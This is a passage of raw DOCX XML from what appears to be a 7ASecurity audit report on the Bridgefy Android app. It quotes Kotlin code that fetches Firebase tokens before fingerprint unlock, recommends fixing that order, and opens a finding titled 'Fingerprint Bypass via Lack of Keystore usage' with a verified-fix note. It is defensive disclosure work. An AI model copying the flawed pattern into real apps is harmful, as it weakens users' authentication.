        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/ux/welcome/WelcomeActivity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1115" w:right="2112" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>onCreate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(savedInstanceState:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Bundle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.onCreate(savedInstanceState)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>binding = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SplashActivityBinding.inflate(layoutInflater)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1115" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gson().fromJson(intent.getStringExtra(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>UserEntity::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(user != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1511" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>userEntity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>UserEntity() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(getFingerPrint()) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="2170" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fingerprintDialog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FingerprintDialog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>setupUserData(user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fingerprintDialog.isCancelable = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fingerprintDialog.show(supportFragmentManager, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>javaClass.simpleName)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>setupUserData(user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1511" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>changeStatusBarColor(R.color.primary) setContentView(binding.root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>updateFirebaseToken()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to improve the implementation of this feature so the app sends the request to obtain the tokens only after the fingerprint has been entered by the user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250047" w:id="8"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Lack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Keystore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(318)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Android app has a feature that locks the app until a valid fingerprint is provided. It was discovered that, since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>biometric</w:t>
      </w:r>
